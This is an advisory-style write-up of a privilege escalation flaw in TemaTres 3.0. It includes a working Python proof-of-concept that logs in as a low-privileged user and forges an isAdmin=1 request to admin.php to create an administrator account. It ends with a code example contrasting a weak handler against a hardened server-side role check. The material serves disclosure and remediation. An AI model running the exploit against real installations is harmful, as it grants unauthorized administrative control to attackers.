TemaTres: controlled vocabulary server 3.0 — Escalation of Privileges
The next image shows a profile with administration privileges; two users have been created.
Logged in as another user without administration privileges, it is possible to add the parameters with the necessary values to create an administrator user.
The next image shows that an administrator user was created successfully.
Proof Of Concept
You can automate the process using the following script:
import requests
import sys

session = requests.Session()

# Optional interception proxy (e.g. Burp listening on 127.0.0.1:8080)
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"
proxyDict = {
    "http": http_proxy,
    "https": https_proxy
}

# Log in as a user that does NOT have administration privileges
url = 'http://localhost/tematres/vocab/login.php'
values = {'id_correo_electronico': 'pablo@tematres.com',
          'id_password': 'admin',
          'task': 'login'}
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']
print(cookie)

host = sys.argv[1]
user = input('[+]User:')
lastname = input('[+]lastname:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
email = input('[+]Email:')

if password == password2:
    # Same form fields the admin user-creation page submits; the low-privileged
    # session sends isAdmin=1 and the server does not verify the caller's role
    data = {
        '_nombre': user,
        '_apellido': lastname,
        '_correo_electronico': email,
        'orga': 'bypassed',
        '_clave': password,
        '_confirmar_clave': password2,
        'isAdmin': 1,
        'boton': 'Guardar',
        'userTask': 'A',
        'useactua': ''
    }
    headers = {
        'Cookie': 'PHPSESSID=' + cookie
    }
    request = session.post(host + '/vocab/admin.php', data=data, headers=headers, proxies=proxyDict)
    print('+-------------------------------------------------+')
    print('Status Code:' + str(request.status_code))
else:
    print('Passwords dont match!!!')
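The fix on the server side is to decide authorization from the session, never from the submitted form. The following added example (not TemaTres code; the user store and session object are constructed stand-ins, only the field names `_nombre`, `_correo_electronico`, `_clave`, `_confirmar_clave`, `isAdmin` and `userTask` come from the request above) contrasts the weak handler pattern with a hardened one:

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    email: str
    is_admin: bool


class Forbidden(Exception):
    """Raised when the calling session lacks the required role."""


def _flag(value) -> bool:
    # Form values arrive as strings; the PoC sends the integer 1
    return str(value) == "1"


def create_user_weak(form: dict, users: list, session_user: User) -> User:
    """Weak pattern: the admin flag is read straight from the POST body,
    so any authenticated session can submit isAdmin=1 and gain an admin
    account. This is the behaviour the advisory above demonstrates."""
    new = User(form["_nombre"], form["_correo_electronico"],
               _flag(form.get("isAdmin", "0")))
    users.append(new)
    return new


def create_user_hardened(form: dict, users: list, session_user: User) -> User:
    """Hardened pattern: the role comes from the server-side session (a
    constructed stand-in here). Only an administrator may create users,
    so a low-privileged caller is rejected before the form is even read."""
    if not session_user.is_admin:
        raise Forbidden("user management requires an administrator session")
    if form.get("userTask") != "A":
        raise ValueError("unsupported task")
    if form["_clave"] != form["_confirmar_clave"]:
        raise ValueError("passwords do not match")
    new = User(form["_nombre"], form["_correo_electronico"],
               _flag(form.get("isAdmin", "0")))
    users.append(new)
    return new
```

The same check belongs on every admin.php task, not just user creation, since the bypass is the missing role check rather than the isAdmin field itself.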